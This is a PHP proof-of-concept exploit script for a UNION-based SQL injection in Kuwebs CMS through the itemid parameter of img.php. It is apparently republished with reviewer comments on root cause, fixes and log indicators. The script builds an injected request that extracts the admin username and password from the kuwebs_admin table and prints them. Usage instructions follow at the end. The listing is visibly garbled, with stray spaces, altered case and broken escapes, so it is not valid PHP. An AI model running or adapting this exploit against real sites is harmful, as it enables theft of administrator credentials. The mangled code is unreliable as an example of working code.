<? Php
// NOTE(review): this listing reached the page with its whitespace and letter
// case altered (spaces inside variable names and string escapes, "$ Host"
// assigned but "$ host" read). It is kept byte-for-byte as published and is
// not valid PHP in this form.
//
// What it documents: a proof-of-concept for a UNION-based SQL injection in
// Kuwebs CMS, reached through the "itemid" query parameter of img.php (see
// the request line further down).
// Defender takeaways:
//  - Root cause is presumably that img.php places itemid into a SQL statement
//    without integer validation or a bound parameter. The server code is not
//    shown here, so confirm against the CMS source. The fix is to validate
//    itemid as an integer and use prepared statements.
//  - Data at risk is the adminuser/adminpassword pair in kuwebs_admin. How
//    the password is stored is not visible here; after a suspected hit,
//    rotate the admin credentials either way.
//  - Log review: look for img.php requests whose itemid contains "union",
//    "select", "concat(", 0x-style hex literals or the table name
//    kuwebs_admin, and for responses containing the "ouou~" marker.

// Only fatal errors are reported; warnings and notices are suppressed.
Error_reporting (E_ERROR );
// Banner text written to the console.
Print_r ('
+ --------------------------------------------------------------------- +
Kuwebs cms SQL injection exp
Home: www.hkmjj.com www.2cto.com
+ --------------------------------------------------------------------- +
');
// With no command-line argument, print the usage text and stop.
If ($ argc <2 ){
Print_r ('
Usage: php '. $ argv [0]. 'Host/path
Example: php '. $ argv [0].' 127.0.0.1 cc
');
Die ();
}
// Output is buffered for the duration of the network exchange.
Ob_start ();
// First argument: target host. Second argument: path prefix of the CMS.
$ Host = $ argv [1];
$ Path = $ argv [2];
// Plain-HTTP TCP connection to port 80 with a 30-second connect timeout.
$ Sock = fsockopen ($ host, 80, $ errno, $ errstr, 30 );
If (! $ Sock) die ("$ errstr ($ errno) \ n ");
// Request line carrying the injected itemid value. The hex literals in the
// concat() decode to "ouou~", "-" and "~1", so a vulnerable server reflects
// the credential pair between those markers in the response body.
// Detection: the percent-encoded "union select" and the kuwebs_admin table
// name appear verbatim in the query string and therefore in access logs.
Fwrite ($ sock, "GET/$ path/img. php? Lang = cn & itemid = 58% 20and % 201 = 2% 20 union % 20 select % 201, concat (0x6F756F757E, adminuser, 0x2D, adminpassword, 0x7E31,, 35 + from + kuwebs_admin % 20 -- HTTP/1.1 \ r \ n ");
Fwrite ($ sock, "Host: $ host \ r \ n ");
// Fixed browser-like headers. The User-Agent (Firefox 6.0.2 on Windows NT
// 5.2) is only a weak indicator because it is trivially changed.
Fwrite ($ sock, "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv: 6.0.2) Gecko/20100101 Firefox/6.0.2 \ r \ n ");
Fwrite ($ sock, "Accept: text/html, application/xhtml + xml, application/xml; q = 0.9, */*; q = 0.8 \ r \ n ");
Fwrite ($ sock, "Accept-Language: zh-cn, zh; q= 0.5 \ r \ n ");
Fwrite ($ sock, "Connection: keep-alive \ r \ n ");
// Collect response lines until the first line that is empty after trimming,
// i.e. the end of the header section.
$ Headers = "";
While ($ str = trim (fgets ($ sock, 1024 )))
$ Headers. = "$ str \ n ";
// Read the remainder of the response into the body until end of stream.
$ Body = "";
While (! Feof ($ sock ))
$ Body. = fgets ($ sock, 1024 );
Fclose ($ sock );
Ob_end_flush ();
// Print_r ($ body );
// Success is judged by the marker text in the body. The value between the
// markers is split on "-" into a username part and a password part.
If (strpos ($ body, 'ouou ')! = False ){
Preg_match ('/ouou ~ (.*?)~ 1/', $ body, $ arr );
$ Result = explode ("-", $ arr [1]);
Print_r ("Exploit Success! \ Nusername: ". $ result [0]." \ npassword: ". $ result [1]." \ n ");
}
Else {
Print_r ("Exploit Failed! \ N ");
}
?>
Save exp. php run
Php.exe exp. php 127.0.0.1
From: hkmjj.com